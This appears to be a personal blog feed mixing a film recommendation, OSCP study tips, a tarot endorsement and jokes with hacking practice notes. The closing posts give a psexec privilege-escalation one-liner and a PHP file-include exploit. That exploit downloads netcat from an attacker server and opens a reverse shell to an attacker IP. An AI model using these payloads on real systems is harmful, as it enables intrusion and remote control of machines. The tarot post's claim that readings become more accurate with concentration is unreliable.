While it’s not the speech at the end of Blade Runner, Hobo With a Shotgun is one of Rutger Hauer’s most enjoyable films. Post apocalyptic and campy with tons of blood and guts. If you liked Machete you’re probably going to like this one. You can watch it on Amazon Prime
If you are like me working you way through the PWK and OSCP, there’s worse ways to spend your time than @TJ Null’s playlist on youtube. Recently updated again with run-throughs by IppSec of relevant boxes. And if you haven’t yet, just get a VIP subscription to hackthebox.eu it’s 10 Euros a month for unlimited legal online practice. It’s worth it.
I’ve been using tarot cards for decades and it doesn’t matter whether they are digital or physical cards in your hands. The secret to getting them to work is concentration. The more you actually concentrate the contents of your mind, the more accurate the reading. Practice with these. The kind and generous maker of fourthdimension.net has put the Crowley deck online for free, and it is absolutely the best deck published so far, chock full of hidden mysteries and philosophical allegory. Avail yourself.
Evidently science has invented something we can’t cut right now. Can science microwave a burrito so hot even science can’t eat it?
With time running out on the extra unemployment benefits a lot of us have been receiving let’s take a moment to remember this…
This will be short and sweet and I only post it because it’s hard to find via google but should be base knowledge for any hacker. SysInternals is your friend. If it’s on the box or you can drop it there it gives pretty complete control at a very granular level. Even if you drop one or two of the tools rather than the whole suite it makes privesc a breeze. For example If you have admin, and need System: psexec -i -s “cmd.exe” that is all. Pretty short and easy to read one-liner and good tool for the arsenal.
Going over some really interesting stuff today on file includes and ran a couple neat exploits on php running on a windows 10 box. LFI/RFI is deadly. Sooo many ways to pop a shell if the url includes ?file=
My favorite of the day was using a php wrapper to pass a command to the page, which ended up letting me execute any arbitrary command on windows. It works like this: The page allows passing of data into the file parameter. Then you pass ?file=data:text/plain,<?php echo shell_exec(“Any random command and parameters”) ?> to the URL and boom command execution. You can use this to pass http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22certutil%20-urlcache%20-split%20-f%20%27http://<attack_server>/nc.exe%27%22)%20?%3E
this places netcat on the system. Then you start a netcat listener on your attack box and visit the URL:
http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22nc.exe%20-nv%20<Attacker IP>%20<Your listener port>%20-e%20cmd.exe%22)%20?%3E
Boom. Interactive reverse shell as the php user from visiting 2 URLs in the browser. Easy win.
Note: The %character escaping is needed for some browsers, but since you are quoting your command string, they may not be necessary as the browser will handle URL encoding on its own.
